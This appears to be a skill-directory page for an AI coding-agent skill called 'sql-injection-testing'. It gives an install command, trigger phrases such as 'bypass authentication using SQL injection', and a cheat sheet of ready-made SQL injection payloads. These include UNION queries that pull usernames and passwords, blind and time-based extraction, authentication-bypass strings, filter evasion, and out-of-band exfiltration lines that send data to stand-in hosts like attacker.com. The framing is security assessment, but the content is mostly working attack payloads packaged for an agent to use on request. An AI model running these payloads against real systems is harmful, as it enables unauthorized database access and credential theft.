academic-paper-reviewe…
Simulates academic peer review, evaluating papers across Originality, Methodology, Results, and Writing to provide Major/Minor Revision recommendations with…
This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query
$ npx -y skills add zebbern/claude-code-guide --skill sql-injection-testing --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
/sql-injection-testingContext preview
The summary Claude sees to decide when to auto-load this skill.
This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query
name: sql-injection-testing description: This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query vulnerabilities". It provides comprehensive techniques for identifying, exploiting, and understanding SQL injection attack vectors across different database systems. metadata: author: zebbern version: "1.1"
Execute comprehensive SQL injection vulnerability assessments on web applications to identify database security flaws, demonstrate exploitation techniques, and validate input sanitization mechanisms. This skill enables systematic detection and exploitation of SQL injection vulnerabilities across in-band, blind, and out-of-band attack vectors to assess application security posture.
Locate user-controlled input fields that interact with database queries:
# Common injection points - URL parameters: ?id=1, ?user=admin, ?category=books - Form fields: username, password, search, comments - Cookie values: session_id, user_preference - HTTP headers: User-Agent, Referer, X-Forwarded-For
Insert special characters to trigger error responses:
-- Single quote test ' -- Double quote test " -- Comment sequences -- # /**/ -- Semicolon for query stacking ; -- Parentheses )
Monitor application responses for:
Verify boolean-based vulnerability presence:
-- True condition tests page.asp?id=1 or 1=1 page.asp?id=1' or 1=1-- page.asp?id=1" or 1=1-- -- False condition tests page.asp?id=1 and 1=2 page.asp?id=1' and 1=2--
Compare responses between true and false conditions to confirm injection capability.
Combine attacker-controlled SELECT statements with original query:
-- Determine column count ORDER BY 1-- ORDER BY 2-- ORDER BY 3-- -- Continue until error occurs -- Find displayable columns UNION SELECT NULL,NULL,NULL-- UNION SELECT 'a',NULL,NULL-- UNION SELECT NULL,'a',NULL-- -- Extract data UNION SELECT username,password,NULL FROM users-- UNION SELECT table_name,NULL,NULL FROM information_schema.tables-- UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
Force database errors that leak information:
-- MSSQL version extraction 1' AND 1=CONVERT(int,(SELECT @@version))-- -- MySQL extraction via XPATH 1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))-- -- PostgreSQL cast errors 1' AND 1=CAST((SELECT version()) AS int)--
Infer data through application behavior changes:
-- Character extraction 1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'-- 1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'-- -- Conditional responses 1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--
Use database sleep functions for confirmation:
-- MySQL 1' AND IF(1=1,SLEEP(5),0)-- 1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)-- -- MSSQL 1'; WAITFOR DELAY '0:0:5'-- -- PostgreSQL 1'; SELECT pg_sleep(5)--
Exfiltrate data through external channels:
-- MSSQL DNS exfiltration
1; EXEC master..xp_dirtree '\\attacker-server.com\share'--
-- MySQL DNS exfiltration
1' UNION SELECT LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\a'))--
-- Oracle HTTP request
1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--Craft payloads to bypass credential verification:
-- Classic bypass
admin'--
admin'/*
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'/*
') OR ('1'='1
') OR ('1'='1'--
-- Username enumeration
admin' AND '1'='1
admin' AND '1'='2Query transformation example:
-- Original query SELECT * FROM users WHERE username='input' AND password='input' -- Injected (username: admin'--) SELECT * FROM users WHERE username='admin'--' AND password='anything' -- Password check bypassed via comment
When special characters are blocked:
-- URL encoding %27 (single quote) %22 (double quote) %23 (hash) -- Double URL encoding %2527 (single quote) -- Unicode alternatives U+
Claude Code Guide - Setup, Commands, workflows, agents, skills & tips-n-tricks from beginner to power user!
Repo: zebbern/claude-code-guide
Simulates academic peer review, evaluating papers across Originality, Methodology, Results, and Writing to provide Major/Minor Revision recommendations with…
This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration",…
This skill should be used when the user asks to "test API security", "fuzz APIs", "find IDOR vulnerabilities", "test REST API", "test GraphQL", "API…
Generate multiple radically different interface designs for a module using parallel sub-agents. Use when user wants to design an API, explore interface…
Interactive system flow tracing across CODE, API, AUTH, DATA, NETWORK layers with SQLite persistence and Mermaid export. Use for security audits, compliance…
Authentication patterns: session vs JWT vs OAuth comparison, provider selection (NextAuth, Clerk, Supabase Auth), security checklist, and common mistakes. Use…